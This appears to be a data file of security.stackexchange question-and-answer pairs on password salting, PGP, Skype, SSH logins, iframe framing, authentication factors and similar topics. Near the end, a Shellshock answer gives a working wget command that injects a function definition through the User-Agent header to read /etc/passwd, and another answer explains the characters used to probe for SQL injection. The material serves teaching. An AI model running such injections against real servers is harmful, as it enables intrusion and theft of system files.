source_id
int64 1
4.64M
| question
stringlengths 0
28.4k
| response
stringlengths 0
28.8k
| metadata
dict |
---|---|---|---|
66,989 | I don't understand how using a random salt for hashing passwords can work. Perhaps random salt refers to something other than hashing passwords? Here is my thought process: The salt is used to add extra junk to the end of a password prior to hashing it, to fight against the likelihood of being cracked by a rainbow table However to ensure you can still verify a password is correct, you must use the same salt for each password prior to encrypting it to see if it matches the hash saved for a certain user If a random salt is used, how can that password ever be verified again? Is the random salt saved somewhere to be used for each encryption? Seems less secure to me if the salt is saved right alongside the hashed password, rather than using some kind of computed salt an attacker would not inherently know if they got a hold of your data. I'm not sure if I'm missing something here, or if random salting has to do with a different scenario in encryption, and doesn't make sense in this particular case. How can a random salt work in the above case of hashing passwords prior to encrypting? | Is the random salt saved somewhere to be used for each encryption? Yes Seems less secure to me if the salt is saved right alongside the hashed password, rather than using some kind of computed salt an attacker would not inherently know if they got a hold of your data. It's not, because the only thing a salt does and was invented to do is, as you said: to fight against the likelyhood of being cracked by a rainbow table and nothing more. It adds complexity to a single password - and for every password in a database, it is unique. To verify the password, you need to store it alongside it. This doesn't compromise the security of that single password in the least bit - the hash algorithm is still as secure as without a salt. But, looking at the whole database, every password is better protected against rainbow attacks, because the attacker must calculate very single hash with the respective salt separately and cannot do bulk operations on them. | {
"source": [
"https://security.stackexchange.com/questions/66989",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26671/"
]
} |
67,110 | Since I was a teenager (that's 20 years ago) and till now-days you see movies with professionals stealing a super-computer and use it to crack a password or a home security system using brute-force (I assume). However they always demonstrate by showing them trying to crack a pin or a password that consists of many digits/characters and the super-computer cracks the fields one by one The green digits on the left have been cracked, the ones on the right yet to come. The super-computer tries to figure out the first digit then the second and so on, you see the numbers keeps fluctuating till it's get locked on the right digit. Does such attack even exist? | What you see in the movies is a plot device to ratchet up tension, every time a character is determined it gives the audience a kick. Reality is a bit different. Brute-force attacks do exist, however it's all or nothing - you either get the whole passcode right or wrong. There's no way to know whether you have guessed a correct character. Passcodes are typically hashed , where changing a single digit will return a completely different cryptographic result. You could get all but a single character right and you wouldn't have any indication you came close. So real password cracking might be a bit boring from a movie point of view, where you need to show progression to maintain audience interest. What they could do is show a progression bar for the calculation of all possible permutations of a hash, but it wouldn't have a predictable end time - you could get lucky and hit it right away, or get it towards the end of your brute force range. Not necessarily good for a movie but a good director could pull it off. | {
"source": [
"https://security.stackexchange.com/questions/67110",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31356/"
]
} |
67,271 | For all of my hobby web projects, I have coded a login system that these projects share. There is no critical data in these projects, the only critical data could be reused passwords. So I try to hash passwords in a very secure way. My current password hashing algorithm is nothing I would call really secure. And as I saw that PHP now offers build in hashing with password_hash , I thought about switching. My question is, what are the benefits of switching for me? In terms of, what extra protection do I get, what hole(s) do I fix, etc.? And is there anything else I have to do to not make it extremely insecure? I would like to use the answers as a learning experience for myself so I can teach it to others who are in my position. My current algorithm (pseudo-code): Salt = "some-salt"
Repeat 1000000 times
Password = Sha512(Salt + username + Salt + Password) I know my site is vulnerable to timing attacks and the PHP built-in functions would fix that. What else is obviously insecure? | For starters you rolled your own piece of password hashing algorithm. There are currently but three password hashing algorithms which are considered secure: PBKDF2 scrypt bcrypt You are iterating and you are appending a salt. You also seem to add the username within the algorithm, which does not add any benefit as you are already using a salt. What I can't deduct from your code and which is very important is the length of your salt and how you generate it. A salt should never be hardcoded, but secure randomly generated when hashing the password. The salt should be unique within the database and preferably globally unique as to avoid identification of similar passwords in different databases (hence a username is not considered a good salt). Also the way PBKDF2 works (which leans closest to your implementation) is by using a HMAC where the random generated salt is the key used to calculate the message digest, rather than appending everything together. PHP's password_hash is using the bcrypt algorithm. So to summarize what you gain by using a standard algorithm instead of your own: You will generate random salts You will use a standardized and secure password hashing algorithm | {
"source": [
"https://security.stackexchange.com/questions/67271",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55397/"
]
} |
67,278 | I was surfing a random blog today ( Enterprise video conferencing solutions vs Skype ), and I came across a claim. I do know that the Skype protocol is a proprietary one, but the author of this blog claims that: Skype makes use of peer to peer technology in which Skype users become supernodes. This allows Skype to tap on your bandwidth to route other calls, often slowing down your computer. What I would like to know, from a networking standpoint, is how is this implemented or even possible? First of all, why is there a need to route calls between user nodes? If person X is calling Y, then isn't it a straightforward TCP connection from X to Y nodes? Why does a Z node have to come in between? Moreover, if this is true, why do most users stick with Skype? Aren't there better opensource technologies available in this arena? | Today, Skype do not route communication through other users machines. This is done by Microsoft servers in datacenters. But back in the days, in the early versions of the Skype protocol, every user with strong-enough bandwidth and not behind a NAT (with routable IP address), can become a supernode and route the traffic of other users that are behind NAT. That's the reason why this is necessary. If your ISP is doing NAT on the gateway level for example, you can open TCP connection to any host you want, but some other unknown host can't reach you, because the incoming connection is not requested by you. That's how the NAT works, and direct TCP/UDP connection can't be established. If two Skype users that are behind a NAT wants to talk each other, in normal conditions, they can't, because they only can request-and-receive packets, but can't receive something that is not requested early. Example:
Host A wants to talk through Skype with Host B.
Host A tries to open TCP/UDP connection to Host B, but the Host B didn't request anything from Host A early, and the NAT of the Host B's gateway just drop the connection. In the reverse direction is the same. So, in order to communicate, they both connect to some supernode that becomes a bridge between them. This works because each client transmit the data to the supernode, and the supernode route them to the other side (which is also connected to the supernode, as i mentioned before). Becoming a supernode can be disabled in early Skype versions with change in the Windows Registry. | {
"source": [
"https://security.stackexchange.com/questions/67278",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29391/"
]
} |
67,285 | I know that it is still not very easy to use PGP for an average user. However, the situation is improving (there are some easy plugins that can even nicely integrate into your GMail webmail). In addition, the press releases of the last time may have encouraged people to think about their safety a little more. What is the best way to tell people that I am capable of encrypting emails using the OpenPGP standard? Possible solutions could be: Sign each outgoing mail However, this will always produce a lot of text even for a small message. This would definitely annoy me if I do not know anything about it or if I don't care. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Hi, yes that is okay.
-----BEGIN PGP SIGNATURE-----
[ a lot of stuff ]
-----END PGP SIGNATURE----- Include a text in the signature of the mail One could write something like: Please note that unencrypted emails can be easily intercepted and read by third parties. For transmitting confidential information please consider encrypting your emails. My PGP key fingerprint is XX XX XX XX XX XX XX. Are there any suggestions on how to write that more precisely while keeping it short and sweet? Asking them directly to encrypt their mails What are the pros/cons of each solution and how can you show people that may it takes less than five minutes to install an appropriate browser plugin and to generate a key pair with it? Should I offer them that I may possibly assist? | Signing mails is in my experience the best method to show others they can send you encrypted mail. If they're using OpenPGP anyway, their mail client might even automatically enable encrypted mails as replies to signed ones. Recently I was very surprised receiving (S/MIME) encrypted mail from both a bank and a health care institute, just because I signed the mails I sent them. You don't need to ( and shouldn't do anyway ) use clear text (inline) signatures (with all their bulk), although they're a very present hint you're accepting OpenPGP encrypted mail. It might be of interest using this if you especially want to prompt others sending encrypted mail, your capability of doing so, or just make them curious... Instead, there is also PGP/MIME , which will not distract anybody (but I think users of MS Outlook might see some attachment they don't understand), but still offer the advantages to other OpenPGP users described above. Always signing mail (using PGP/MIME or S/MIME) produces some background noise, but doesn't disturb and nobody has to care about a few additional bits in each mail, and you might get awareness for signing and encryption into the subconscious mind. Worked out for me pretty well, I got quite a bunch of people around me to sign and encrypted mail this way (or do it again, and regularly). Put your fingerprint into your signature and on your business card . Expect to get asked about it, and be ready to explain what that's all about. Put your public key on keyservers . Lots of mail clients with support for OpenPGP automatically query them, especially after receiving signed mail. Talk to others. Request them to send confidential information encrypted. Encrypting mails is rather easy, the sender doesn't even have to create his own key pair. Guiding others is rather easy even on the phone if you tried the most relevant plugins. Consider also using S/MIME , even if it's "just" a CAcert certificate. Even if the certificate is not trusted, most mail clients support S/MIME out of the box, and replying with encrypted mail is much easier than with OpenPGP: no plugins required, and the certificate is automatically attached to your mail, the replying sender just has to click the "encrypt" button. | {
"source": [
"https://security.stackexchange.com/questions/67285",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55411/"
]
} |
67,295 | Is there a threat from screenshots with blacked out info? That is can someone take out that aftermarket addition so to speak? For instance I take a screenshot (using MS snipper) Then I 'blur/blackout' some info Is the picture above vulnerable to someone looking through its hex values for that extra green layer and just removing it, thus reconstructing the original image (or any other way to 'take off' my attempt of redacting info)? To make it more secure I always then open up the blurred out screen and then screen capture that. Does the above screen of a screen add better security -there is no way to reconstruct missing data because nothing is "missing"? I have always been paranoid but after finding out a colleague does the same thing, I'd thought I'd ask. update So I compared pics one and two (from above) and looked at the hex values, the metadata had not changed at all and the only change was within the image data itself (results below). The results are specific to this particular editor and process. The possibility (likelihood) does exist for data to be recovered if using other tools. | Usually the PNG format does not support multiple layers. So when you draw over something, whatever was there before is lost. However, the PNG format supports storage of an unlimited amount of metadata which is usually not displayed by image viewers. This feature is often used by image editors to add additional metadata to the image. One possible use-case is to store the undo-history of the image. This could mean that the previous version can be restored. To prevent this, make sure to set the exporting settings of your editor in a "export for web" mode which is supposed to strip all unnecessary data from the file. How to do this (and if it is even necessary) depends on the image editor. Another possible faux-pas is to use an image blurring method which isn't 100% effective. You could, for example, accidentally set the opacity of your brush to almost but not completely 100%, which would mean that the section isn't recognizable by the human eye but might be made readable again by enhancing the contrast of the section. Another mistake is to use a filter which is reversible. I remember a case of a child-pornographer who got caught because he blurred out his own face with the "twirl" filter in Photoshop not realizing that when the same filter is applied in reverse, the image is restored to almost the original . | {
"source": [
"https://security.stackexchange.com/questions/67295",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/43611/"
]
} |
67,362 | I have just received this email from AbeBooks.com: Hello AbeBooks Customer, This is an important message from AbeBooks.com. As part of our routine security monitoring, we have learned that a
list of email addresses and passwords were posted online this week. While the list was not AbeBooks-related, we know that many people
reuse their passwords on several websites. We believe your email
address and password set was on the list posted online. Therefore we have taken the precaution of disabling your password on
your account. We apologize for any inconvenience this has caused but
felt that it was necessary to help protect you and your AbeBooks
account. I don't care so much about my AbeBooks.com account as I barely use it. But, I am very worried to know that my email and password are published online. Although I tried to Google for my email and haven't found anything. What should I do now? Should I change the passwords in all my 50+ accounts? | Probably the most comprehensive database of searchable compromised accounts is haveibeenpwned.com . If you've reused the password in multiple places then yes you should assume that password has been compromised. I also recommend enabling two-factor authentication wherever possible as this will reduce the risk of one account being compromised leading to other accounts being compromised. | {
"source": [
"https://security.stackexchange.com/questions/67362",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27908/"
]
} |
67,427 | I know that there are different types of authentication mechanisms available. One among them is the HTTP authentication. What is the danger in using this method compared to other methods? | Basic authentication has a number of drawbacks, one of which is that the username and password are passed in the clear with every request. This is clearly unsafe under HTTP, but is somewhat less vulnerable under HTTPS. However, because the credentials are submitted with every request, it's still worse than any other method (including digest) that does not have this limitation. The primary reason is that now every single request can be a target for cleartext credential theft, not just an initial login request. In most systems, after login, the most an attacker can hope to retrieve is a session or authentication token. With basic auth, any request is an opportunity to steal the user's password. This is not ideal. Digest auth is somewhat better in that it sends an MD5 digest of some various bits including the username, password, and a nonce (among other values) and not the cleartext credentials...A password cannot be extracted from a captured digest. With HTTP authentication (in any form) you're also dependent on the client to provide the authentication user experience, which can have its own issues and so needs to be well tested with the clients you expect to be using your application. IN the past, for instance, I've seen specific browsers fail to authenticate because of certain special characters in a password, for instance. With application based authentication UX, you have control over this. With HTTP auth, you do not. Another attack (and its a very minor one) is that if you display user-generated, externally hosted content on your site, you open yourself up to very subtle 401 phishing attacks. Since your users are used to the client's chrome for HTTP authentication, they won't necessarily notice if they get an authentication prompt on your site for a slightly different domain. Depending on your application, this may not be a valid threat at all, but it's certainly something to consider if you go down the HTTP auth route. | {
"source": [
"https://security.stackexchange.com/questions/67427",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55343/"
]
} |
67,439 | I've noticed, based on the logging of my NAS, that my IP address is targeted by a hacker. I already took action by automaticly ban the IP address permanently after five unsuccesful login attemps. Unfortunately, the hack is being processed by using multiple different IP adresses, so to me this security attempt is not valid as it only works till the hacker runs out of IP addresses or when he gets the right username/password combination. Which sounds rather tricky to me, and I don't want to wait till one of these two events will happen. I googled some of the IP adresses which are banned and they show up on several 'hacker' sites as hacker IP adresses. Should I do something and are my worries justified? | As for anything attached to public networks: Reduce your attack surface - can you remove the NAS from the Internet? Can you limit the IPs that are allowed to connect? Increase cost of attack - lockouts are great, but also make sure that you have a complex password and that you change it regularly Monitor access - keep your eye on who successfully logs in Treat the risks - have a plan for the event when someone actually breaks in. Can the NAS be used to access the rest of your network? Is there anything on it that would be a risk if it fell into the wrong hands? Do you have backups? | {
"source": [
"https://security.stackexchange.com/questions/67439",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55555/"
]
} |
67,486 | I noticed that today after I scanned a site on the Qualys SSL Labs site that SSL ciphersuites which use SHA1 are now highlighted as being "Weak". It seems this has just happened; I scan sites pretty regularly and haven't seen this before. We have all known for some time that SHA1 has some weaknesses. Does this change reflect some new problems with SHA1? Has something officially changed in the industry to now have SHA1-based ciphersuites considered "weak"? Or is this just something the Qualys site is choosing to do now? | Nothing has changed in the industry. Qualys is now just highlighting what we already know. It is to give you a reminder that you should move away from SHA-1. It's not generally considered a critical problem yet, but should be sorted as part of normal refresh/update cycles. | {
"source": [
"https://security.stackexchange.com/questions/67486",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/53029/"
]
} |
67,596 | Is it in general a security problem not to update your browser. Firefox constantly prompts me to update my browser, but how dangerous is it to not update? As part of this question, I would like to know what that problem exactly is. What are the risks of not updating your browser? What exactly could happen? | Because there are security vulnerabilities found in software all the time. These vulnerabilities are sometimes publicly disclosed, sometimes not. Either way, as developers find or find out about them they patch them. Running old versions of browsers leaves you vulnerable to malicious websites trying to infect your computer. Below are links to web pages listing vulnerabilities that have been fixed in relatively recent versions of the 3 most popular browsers. Microsoft Internet Explorer Mozilla Firefox Google Chrome All browsers are going to have bugs, and all of them will have vulnerabilities. But staying on top of known vulnerabilities can help prevent attackers from gaining access to your system. Edit Thanks to kirb for these extra links to up-to-date blogs of browser security updates IEBlog Google Chrome Releases | {
"source": [
"https://security.stackexchange.com/questions/67596",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10435/"
]
} |
67,602 | I have a raspberry-pi (running GNU/Linux) and I recently allowed my router to forward port 22 (ssh) to the raspberry-pi so that I could log in while away from home. I then noticed a bunch of apparent break-in attempts (failed root logins coming from a chinese ip address) in auth.log, and I have a couple questions about the timing of the failed root logins. Here's a snippet from my /var/log/auth.log file (the first number is just the line number from vi): 5966 Sep 7 11:50:19 raspberrypi sshd[13759]: Failed password for root from 122.225.103.125 port 34328 ssh2
5967 Sep 7 11:50:20 raspberrypi sshd[13755]: Failed password for root from 122.225.103.125 port 32582 ssh2
5968 Sep 7 11:50:20 raspberrypi sshd[13763]: Failed password for root from 122.225.103.125 port 35381 ssh2
5969 Sep 7 11:50:21 raspberrypi sshd[13759]: Failed password for root from 122.225.103.125 port 34328 ssh2
5970 Sep 7 11:50:22 raspberrypi sshd[13763]: Failed password for root from 122.225.103.125 port 35381 ssh2
5971 Sep 7 11:50:24 raspberrypi sshd[13767]: Failed password for root from 122.225.103.125 port 39706 ssh2
5972 Sep 7 11:50:24 raspberrypi sshd[13763]: Failed password for root from 122.225.103.125 port 35381 ssh2
5973 Sep 7 11:50:25 raspberrypi sshd[13771]: Failed password for root from 122.225.103.125 port 40360 ssh2
5974 Sep 7 11:50:26 raspberrypi sshd[13767]: Failed password for root from 122.225.103.125 port 39706 ssh2
5975 Sep 7 11:50:26 raspberrypi sshd[13771]: Failed password for root from 122.225.103.125 port 40360 ssh2
5976 Sep 7 11:50:28 raspberrypi sshd[13767]: Failed password for root from 122.225.103.125 port 39706 ssh2
5977 Sep 7 11:50:28 raspberrypi sshd[13775]: Failed password for root from 122.225.103.125 port 41540 ssh2
5978 Sep 7 11:50:29 raspberrypi sshd[13771]: Failed password for root from 122.225.103.125 port 40360 ssh2
5979 Sep 7 11:50:31 raspberrypi sshd[13775]: Failed password for root from 122.225.103.125 port 41540 ssh2
5980 Sep 7 11:50:31 raspberrypi sshd[13767]: Failed password for root from 122.225.103.125 port 39706 ssh2
5981 Sep 7 11:50:31 raspberrypi sshd[13771]: Failed password for root from 122.225.103.125 port 40360 ssh2
5982 Sep 7 11:50:33 raspberrypi sshd[13775]: Failed password for root from 122.225.103.125 port 41540 ssh2
5983 Sep 7 11:50:33 raspberrypi sshd[13771]: Failed password for root from 122.225.103.125 port 40360 ssh2
5984 Sep 7 11:50:34 raspberrypi sshd[13767]: Failed password for root from 122.225.103.125 port 39706 ssh2
5985 Sep 7 11:50:35 raspberrypi sshd[13775]: Failed password for root from 122.225.103.125 port 41540 ssh2
5986 Sep 7 11:50:35 raspberrypi sshd[13771]: Failed password for root from 122.225.103.125 port 40360 ssh2
5987 Sep 7 11:50:36 raspberrypi sshd[13767]: Failed password for root from 122.225.103.125 port 39706 ssh2
5988 Sep 7 11:50:37 raspberrypi sshd[13775]: Failed password for root from 122.225.103.125 port 41540 ssh2
5989 Sep 7 11:50:38 raspberrypi sshd[13779]: Failed password for root from 122.225.103.125 port 46112 ssh2
5990 Sep 7 11:50:39 raspberrypi sshd[13775]: Failed password for root from 122.225.103.125 port 41540 ssh2 And, here's a snippet from my /etc/pam.d/login file (the first number is just the line number from vi): 9 auth optional pam_faildelay.so delay=3000000 As you can see the delay is set in pam.d/login to three seconds... However the failed root logins are coming at about 1 second apart. How is this possible? Is it because the logins are coming from different ports or ttys? Also, when I try to emulate this behavior myself by putting in the wrong root password, I find that after three attempts I get disconnected and this shows up in auth.log like: 231 Sep 17 11:51:57 raspberrypi sshd[17591]: Failed password for root from 192.168.42.71 port 34208 ssh2
232 Sep 17 11:52:01 raspberrypi sshd[17591]: Failed password for root from 192.168.42.71 port 34208 ssh2
233 Sep 17 11:52:04 raspberrypi sshd[17591]: Failed password for root from 192.168.42.71 port 34208 ssh2
234 Sep 17 11:52:04 raspberrypi sshd[17591]: Connection closed by 192.168.42.71 [preauth] My three failed attempts are spaced out by at least 3 seconds (as specified in pam.d/login). How is it possible for whoever is trying to break in to make more that one attempt every three seconds and why is the connection not being closed after three failed attempts? Any help understanding this behavior would be greatly appreciated. Feel free to give references if you are not in the mood to type out an answer. Oh, also, if anyone has any idea as to how my ip address was targeted or if it is just random, I would be interested to hear about it. | Because there are security vulnerabilities found in software all the time. These vulnerabilities are sometimes publicly disclosed, sometimes not. Either way, as developers find or find out about them they patch them. Running old versions of browsers leaves you vulnerable to malicious websites trying to infect your computer. Below are links to web pages listing vulnerabilities that have been fixed in relatively recent versions of the 3 most popular browsers. Microsoft Internet Explorer Mozilla Firefox Google Chrome All browsers are going to have bugs, and all of them will have vulnerabilities. But staying on top of known vulnerabilities can help prevent attackers from gaining access to your system. Edit Thanks to kirb for these extra links to up-to-date blogs of browser security updates IEBlog Google Chrome Releases | {
"source": [
"https://security.stackexchange.com/questions/67602",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/49741/"
]
} |
67,889 | I did a small test on Chrome (V37) today. I created a small page and loaded it to the browser: <!DOCTYPE html>
<html>
<head>
<title>Untitled Document</title>
</head>
<body>
<p>Normal page</p>
<iframe src="https://security.stackexchange.com/" />
</body>
</html> Inspecting the console I found this error message: Refused to display ' https://security.stackexchange.com/ ' in a frame because it set 'X-Frame-Options' to 'SAMEORIGIN'. Why do browsers need to enforce same-origin policy on iframe s? | Review: Same-origin policy First, let's clarify that the behavior observed here (the iframe does not render) is much stricter than the default same-origin policy. If you already understand that, skip down to " What's actually happening ," below. To review, the same-origin policy prevents scripts from having programmatic access to the contents of cross-origin resources. Consider how the same-origin policy applies to various types of resources: Images: An <img> tag will show a cross-origin image to a user visually, but it will not allow a script to read the image content when loaded into a <canvas> (i.e., toDataURL will fail if the canvas contains any cross-origin images) Scripts: Cross-origin scripts will run when referenced in a <script> element, but the page can only run the script, not read its contents. Iframe: Like images, the contents of a framed cross-origin page appear visually to the user, but scripts in the outer framing page are not allowed access to the framed page's contents. The same-origin policy applies to iframes for the same reason it applies to all other types of resources: the web page being framed (or the image being displayed, or the resource being accessed via Ajax) is fetched using credentials from the resource's own origin (e.g., the HTTP request to fetch a resource from google.com includes my browser's cookies set for google.com ). The page that issued the request should not be given read-access to a resource fetched with credentials from a different origin. What's actually happening: X-Frame-Options However, the behavior you see here is stricter than the same-origin policy: the framed page is not shown at all . The cross-origin server that hosts the (would-be) framed page requests this blocking behavior by sending an X-Frame-Options response header , which specifies how the page is allowed to be framed. DENY The page cannot be displayed in a frame, regardless of the site attempting to do so. SAMEORIGIN The page can only be displayed in a frame on the same origin as the page itself. ALLOW-FROM uri The page can only be displayed in a frame on the specified origin. Here, the site sends X-Frame-Options: SAMEORIGIN , which means the site can only be framed by pages with the same origin as the framed page. From a security standpoint, this is done to prevent clickjacking (also called a "UI redress" attack). In a clickjacking attack, the page displays a click-activated component of another site inside an <iframe> and tricks the user into clicking it (usually by layering the the target component on top of an apparently-clickable feature of the framing site). For a trivial example, a site might position a transparent <iframe> of http://security.stackexchange.com so that the "log out" link in the framed site was directly over top of a "Click here to claim your free money" button. When viewing the framing page, the user attempts to claim the free money, and suddenly finds himself logged out of Stack Exchange. When http://security.stackexchange.com sends an X-Frame-Options: SAMEORIGIN header, the malicious cross-origin page gets only an empty <iframe> instead; the user doesn't unwittingly click a log-out link because no content from the framed site made it onto the rendered page. OWASP has a page detailing defenses against clickjacking . | {
"source": [
"https://security.stackexchange.com/questions/67889",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/53150/"
]
} |
67,893 | When posting questions, it is often quite useful to include debug output. However, it sometimes include the MAC address of my laptop, router, or both. What are the possible dangers of releasing these mac addresses publicly? | Disclosing the MAC address in itself shouldn't be a problem. MAC addresses are already quite predictable , easily sniffable , and any form of authentication dependent on them is inherently weak and shouldn't be relied upon. MAC addresses are almost always only used "internally" (between you and your immediate gateway). They really don't make it to the outside world and thus cannot be used to connect back to you, locate you, or otherwise cause you any direct harm. The disclosure can be linked to your real identity since it might be possible to track you using data collected from WiFi networks, or it can be used to falsify a device's MAC address to gain access to some service (mostly some networks) on which your MAC address is white-listed. Personally, I wouldn't really worry about it. However, when it's not inconvenient, I usually try to redact any irrelevant information when asking for help or sharing anything. | {
"source": [
"https://security.stackexchange.com/questions/67893",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/36681/"
]
} |
67,900 | What is a proper or, if possible to tell, the best way to store configuration in matters of security? So far I can tell that a database with very restricted access is a good way, but please let's exclude the database for the moment. I'm talking about things like encrypted properties files. As this is already a suggestion, I would also like to know about something like common mistakes or things I definitely have to keep in mind to acquire a secure configuration. There are already related discussions on "the best way to store configuration", however I wasn't able to find something with focus on security. The application runs non-distributed on a host-machine, so the configuration is stored on local system. The application is, so to say, a single user application. We are talking about something like a software-firewall to be concrete. I'm actually thinking of application-scoped settings. I need data protection in a sense of privacy (I don't want to expose functionality and configuration) and integrity. I'm not afraid of an insider (admin) but more of intruders. I already asked this question on stackoverflow but I think it is more appropriate to ask it here. I will delete the stackoverflow post in timely manner. | Disclosing the MAC address in itself shouldn't be a problem. MAC addresses are already quite predictable , easily sniffable , and any form of authentication dependent on them is inherently weak and shouldn't be relied upon. MAC addresses are almost always only used "internally" (between you and your immediate gateway). They really don't make it to the outside world and thus cannot be used to connect back to you, locate you, or otherwise cause you any direct harm. The disclosure can be linked to your real identity since it might be possible to track you using data collected from WiFi networks, or it can be used to falsify a device's MAC address to gain access to some service (mostly some networks) on which your MAC address is white-listed. Personally, I wouldn't really worry about it. However, when it's not inconvenient, I usually try to redact any irrelevant information when asking for help or sharing anything. | {
"source": [
"https://security.stackexchange.com/questions/67900",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55923/"
]
} |
67,972 | It has been seen that security testers input either ' or ; into the application entry points to test for SQL injection. Why are these characters used? | The character ' is used because this is the character limiter in SQL. With ' you delimit strings and therefore you can test whether the strings are properly escaped in the targeted application or not. If they are not escaped directly you can end any string supplied to the application and add other SQL code after that. The character ; is used to terminate SQL statements. If you can send the character ; to an application and it is not escaped outside a string (see above) then you can terminate any SQL statement and create a new one which leaves a security breach. | {
"source": [
"https://security.stackexchange.com/questions/67972",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55343/"
]
} |
67,973 | I have a Windows 8.1 machine that seems to be acting weird and getting slow day by day. I believe that it may be a victim of Remote access Trojan(RAT) infection. How do I listen to ports on my PC and how do I close them if necessary ? How do I deduce that a port is associated with a RAT and how do I close it ? Will netstat be of any use in this respect ? | The character ' is used because this is the character limiter in SQL. With ' you delimit strings and therefore you can test whether the strings are properly escaped in the targeted application or not. If they are not escaped directly you can end any string supplied to the application and add other SQL code after that. The character ; is used to terminate SQL statements. If you can send the character ; to an application and it is not escaped outside a string (see above) then you can terminate any SQL statement and create a new one which leaves a security breach. | {
"source": [
"https://security.stackexchange.com/questions/67973",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55990/"
]
} |
67,991 | I am planning for GPEN certification, although i have been extensively involved in penetration projects, still looking at the topics it seems a bit difficult.. what could be good study guide for preparation? | The character ' is used because this is the character limiter in SQL. With ' you delimit strings and therefore you can test whether the strings are properly escaped in the targeted application or not. If they are not escaped directly you can end any string supplied to the application and add other SQL code after that. The character ; is used to terminate SQL statements. If you can send the character ; to an application and it is not escaped outside a string (see above) then you can terminate any SQL statement and create a new one which leaves a security breach. | {
"source": [
"https://security.stackexchange.com/questions/67991",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55995/"
]
} |
68,008 | I'm looking at some malware PCAPs, e.g. http://malware-traffic-analysis.net/2014/05/27/index.html . One of the things I've been seeing frequently is requests to alexa top million sites (e.g. yandex, google, yahoo). I've always considered this to be a connection checking technique. However, recently I've been thinking about other information you can glean from that request (e.g. a rough geoip feature through DNS / page redirection). I am looking for links on the subject and thoughts about this technique in common/uncommon malware. | Most likely, it's just trying to check if there's a working internet connection. The malware authors assume that: Google (or other Alexa Top-1M sites) will be up 99.999% of the time. Traffic going to common productivity sites like Google will not be flagged as unusual. You (or your network administrator) will be unlikely to have blocked these sites at the gateway. As such, Google is a good candidate. | {
"source": [
"https://security.stackexchange.com/questions/68008",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/36448/"
]
} |
68,009 | I'm sure you've all heard of two-factor/multi-factor authentication. Basically it comes down to these factors: Knowledge - something you know (e.g. password, PIN, pattern) Possession - something you have (e.g. mobile phone, credit card, key) Existence - something you are (e.g. fingerprint) My question is: Does a fourth factor of authentication exist? A quick search on Google did not bring any interesting results other than a patent document that I didn't bother reading through. Could somewhere you are be considered a fourth factor? | As you noted, the main three are: Something you know Something you have Something you are I'd argue that there are others: Something you can do , e.g. accurately reproducing a signature. Something you exhibit , e.g. a particular personality trait, or even neurological behaviour that could be read by an fMRI. These are not strictly "are" features, as they're more fluid. Someone you know, e.g. authentication by chain of trust. Somewhere you are (or have access to), e.g. locking a session to an IP, or sending a confirmation pin to your address. This one is a bit tenuous in terms of being called an authentication factor, but it's still useful to note. | {
"source": [
"https://security.stackexchange.com/questions/68009",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/28137/"
]
} |
68,071 | Paypal has a new payment option called "Bank Account" which says: Enter your online banking ID + password QUESTION : To me it sounds unsafe (ie: sends my password to a third-party organization like Paypal), but does there actually exist any security mechanism/protocol that they could be using to make this operation safe? Notes: Seen from Japan, on Firefox 32.0 Ubuntu 2014.04, URL starts with https://www.paypal.com/ The warning symbol in the URL says "Connection Partially Encrypted". | Once you submit that form, the information clearly goes to PayPal. So, yes, your password is definitely sent to PayPal. However, PayPal is saying that that it only uses your bank account credentials to confirm/verify your account . What seems to happen is that PayPal takes your information then sends it to your online banking provider for verification. What PayPal does with your credentials after that is unknown. They might store it for future payments, or they discard it after the verification process. In one line: Yes, your bank password goes to PayPal. Is it bad? Well, it depends on how much you trust PayPal. By comparison, in Finland we have a completely different system with PayPal. When PayPal needs to verify the bank account or withdraw from the bank account, you get redirected directly to the bank's online banking page. You login there, and then you get redirected back to PayPal. They only get a verification token from the bank. The system is called TUPAS . | {
"source": [
"https://security.stackexchange.com/questions/68071",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/634/"
]
} |
68,122 | I read some articles ( article1 , article2 , article3 , article4 ) about the Shellshock Bash bug ( CVE-2014-6271 reported Sep 24, 2014) and have a general idea of what the vulnerability is and how it could be exploited. To better understand the implications of the bug, what would be a simple and specific example of an attack vector / scenario that could exploit the bug? | A very simple example would be a cgi, /var/www/cgi-bin/test.cgi: #!/bin/bash
echo "Content-type: text/plain"
echo
echo
echo "Hi" Then call it with wget to swap out the User Agent string. E.g. this will show the contents of /etc/passwd: wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://10.248.2.15/cgi-bin/test.cgi To break it down: "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" Looks like: () {
test
}
echo \"Content-type: text/plain\"
echo
echo
/bin/cat /etc/passwd The problem as I understand it is that while it's okay to define a function in an environment variable, bash is not supposed to execute the code after it. The extra "Content-type:" is only for illustration. It prevents the 500 error and shows the contents of the file. The above example also shows how it's not a problem of programming errors, even normally safe and harmless bash cgi which doesn't even take user input can be exploited. | {
"source": [
"https://security.stackexchange.com/questions/68122",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/19698/"
]
} |
